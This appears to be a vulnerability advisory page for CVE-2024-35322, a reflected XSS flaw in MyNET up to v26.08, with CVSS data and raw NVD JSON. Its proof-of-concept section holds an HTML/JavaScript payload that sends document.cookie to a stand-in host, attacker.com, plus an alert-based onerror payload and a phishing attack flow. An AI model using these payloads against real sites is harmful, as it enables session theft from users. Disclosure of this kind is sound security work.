Security Vulnerability Report
中文
CVE-2024-35322 CVSS 6.1 MEDIUM

CVE-2024-35322

Published: 2025-12-24 16:15:47
Last Modified: 2025-12-31 18:49:10
Source: [email protected]

Description

MyNET up to v26.08 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the ficheiro parameter.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:airc:mynet:*:*:*:*:*:*:*:* - VULNERABLE
MyNET <= v26.08

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2024-35322 PoC: Reflected XSS via ficheiro parameter --> <!-- Target: MyNET up to v26.08 --> <!-- Attack Scenario: Steal victim cookies --> <!DOCTYPE html> <html> <head> <title>CVE-2024-35322 PoC</title> </head> <body> <h2>CVE-2024-35322 Reflected XSS PoC</h2> <p>Target: MyNET up to v26.08</p> <p>Vulnerable Parameter: ficheiro</p> <!-- Malicious URL that triggers XSS --> <p>Malicious URL:</p> <code id="maliciousUrl"></code> <script> // Generate the malicious URL var baseUrl = window.location.origin + "/path"; // Replace with actual vulnerable endpoint var payload = "<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>"; var maliciousUrl = baseUrl + "?ficheiro=" + encodeURIComponent(payload); document.getElementById("maliciousUrl").innerHTML = maliciousUrl; // Simpler XSS alert PoC var simplePayload = "<img src=x onerror=alert('XSS-VULNERABILITY-CONFIRMED')>"; console.log("Simple PoC URL:", baseUrl + "?ficheiro=" + encodeURIComponent(simplePayload)); </script> <!-- Attack Flow: 1. Attacker crafts malicious URL with XSS payload in ficheiro parameter 2. Attacker tricks victim into clicking the link (phishing, email, etc.) 3. Victim's browser sends request to vulnerable MyNET application 4. Server reflects the unsanitized input in response 5. Victim's browser executes the injected JavaScript 6. Attacker steals victim's cookies/session via fetch() or similar Mitigation: - Input validation and output encoding - Content Security Policy (CSP) headers - Upgrade to MyNET version > v26.08 --> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-35322", "sourceIdentifier": "[email protected]", "published": "2025-12-24T16:15:46.653", "lastModified": "2025-12-31T18:49:10.483", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "MyNET up to v26.08 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the ficheiro parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:airc:mynet:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.08", "matchCriteriaId": "0F0C1BF8-3346-4D0E-9AA9-1B8CD5E98597"}]}]}], "references": [{"url": "https://miguelsantareno.github.io/airc_exploit.txt", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.